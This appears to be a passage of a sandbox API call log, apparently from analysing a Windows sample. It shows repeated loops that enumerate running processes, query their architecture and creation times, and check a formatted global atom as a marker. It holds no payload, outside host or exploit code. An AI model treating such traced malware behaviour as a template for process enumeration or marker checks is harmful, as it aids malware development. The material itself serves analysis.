	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.295] CloseHandle (hObject=0x694) returned 1
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.296] CloseHandle (hObject=0x694) returned 1
	[0106.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.296] CloseHandle (hObject=0x694) returned 1
	[0106.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.296] CloseHandle (hObject=0x694) returned 1
	[0106.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.297] CloseHandle (hObject=0x694) returned 1
	[0106.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.297] CloseHandle (hObject=0x694) returned 1
	[0106.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.297] CloseHandle (hObject=0x694) returned 1
	[0106.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.297] CloseHandle (hObject=0x694) returned 1
	[0106.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.298] CloseHandle (hObject=0x694) returned 1
	[0106.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.298] CloseHandle (hObject=0x694) returned 1
	[0106.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.298] CloseHandle (hObject=0x694) returned 1
	[0106.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.298] CloseHandle (hObject=0x694) returned 1
	[0106.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.298] CloseHandle (hObject=0x694) returned 1
	[0106.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.299] CloseHandle (hObject=0x694) returned 1
	[0106.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.299] CloseHandle (hObject=0x694) returned 1
	[0106.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.299] CloseHandle (hObject=0x694) returned 1
	[0106.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.299] CloseHandle (hObject=0x694) returned 1
	[0106.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.300] CloseHandle (hObject=0x694) returned 1
	[0106.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.300] CloseHandle (hObject=0x694) returned 1
	[0106.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.300] CloseHandle (hObject=0x694) returned 1
	[0106.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.300] CloseHandle (hObject=0x694) returned 1
	[0106.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.300] CloseHandle (hObject=0x694) returned 1
	[0106.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.301] CloseHandle (hObject=0x694) returned 1
	[0106.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.301] CloseHandle (hObject=0x694) returned 1
	[0106.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.301] CloseHandle (hObject=0x694) returned 1
	[0106.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.313] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.313] CloseHandle (hObject=0x694) returned 1
	[0106.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.315] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.316] CloseHandle (hObject=0x694) returned 1
	[0106.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.318] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.318] CloseHandle (hObject=0x694) returned 1
	[0106.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.320] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.322] CloseHandle (hObject=0x694) returned 1
	[0106.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.324] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.324] CloseHandle (hObject=0x694) returned 1
	[0106.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.331] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.332] CloseHandle (hObject=0x694) returned 1
	[0106.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.338] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.340] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.341] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.342] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.345] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.348] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.349] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.349] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.350] CloseHandle (hObject=0x694) returned 1
	[0106.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.357] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.360] CloseHandle (hObject=0x694) returned 1
	[0106.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.360] CloseHandle (hObject=0x694) returned 1
	[0106.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.360] CloseHandle (hObject=0x694) returned 1
	[0106.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.404] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.404] CloseHandle (hObject=0x694) returned 1
	[0106.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.405] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.405] CloseHandle (hObject=0x694) returned 1
	[0106.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.405] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.405] CloseHandle (hObject=0x694) returned 1
	[0106.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.405] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.405] CloseHandle (hObject=0x694) returned 1
	[0106.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.405] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.406] CloseHandle (hObject=0x694) returned 1
	[0106.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.406] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.406] CloseHandle (hObject=0x694) returned 1
	[0106.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.406] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.406] CloseHandle (hObject=0x694) returned 1
	[0106.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.406] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.406] CloseHandle (hObject=0x694) returned 1
	[0106.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.406] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.406] CloseHandle (hObject=0x694) returned 1
	[0106.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.407] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.407] CloseHandle (hObject=0x694) returned 1
	[0106.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.407] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.407] CloseHandle (hObject=0x694) returned 1
	[0106.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.407] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.407] CloseHandle (hObject=0x694) returned 1
	[0106.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.407] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.407] CloseHandle (hObject=0x694) returned 1
	[0106.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.407] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.407] CloseHandle (hObject=0x694) returned 1
	[0106.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.408] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.408] CloseHandle (hObject=0x694) returned 1
	[0106.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.408] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.408] CloseHandle (hObject=0x694) returned 1
	[0106.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.408] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.408] CloseHandle (hObject=0x694) returned 1
	[0106.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.408] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.408] CloseHandle (hObject=0x694) returned 1
	[0106.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.408] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.408] CloseHandle (hObject=0x694) returned 1
	[0106.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.409] CloseHandle (hObject=0x694) returned 1
	[0106.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.409] CloseHandle (hObject=0x694) returned 1
	[0106.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.409] CloseHandle (hObject=0x694) returned 1
	[0106.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.409] CloseHandle (hObject=0x694) returned 1
	[0106.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.409] CloseHandle (hObject=0x694) returned 1
	[0106.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.410] CloseHandle (hObject=0x694) returned 1
	[0106.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.410] CloseHandle (hObject=0x694) returned 1
	[0106.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.410] CloseHandle (hObject=0x694) returned 1
	[0106.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.410] CloseHandle (hObject=0x694) returned 1
	[0106.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.411] CloseHandle (hObject=0x694) returned 1
	[0106.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.411] CloseHandle (hObject=0x694) returned 1
	[0106.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.411] CloseHandle (hObject=0x694) returned 1
	[0106.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.411] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.412] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.412] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.412] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.412] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.412] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.413] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.413] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.413] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.413] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.413] CloseHandle (hObject=0x694) returned 1
	[0106.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.413] CloseHandle (hObject=0x694) returned 1
	[0106.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.414] CloseHandle (hObject=0x694) returned 1
	[0106.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.414] CloseHandle (hObject=0x694) returned 1
	[0106.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.457] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.457] CloseHandle (hObject=0x694) returned 1
	[0106.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.458] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.458] CloseHandle (hObject=0x694) returned 1
	[0106.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.458] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.458] CloseHandle (hObject=0x694) returned 1
	[0106.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
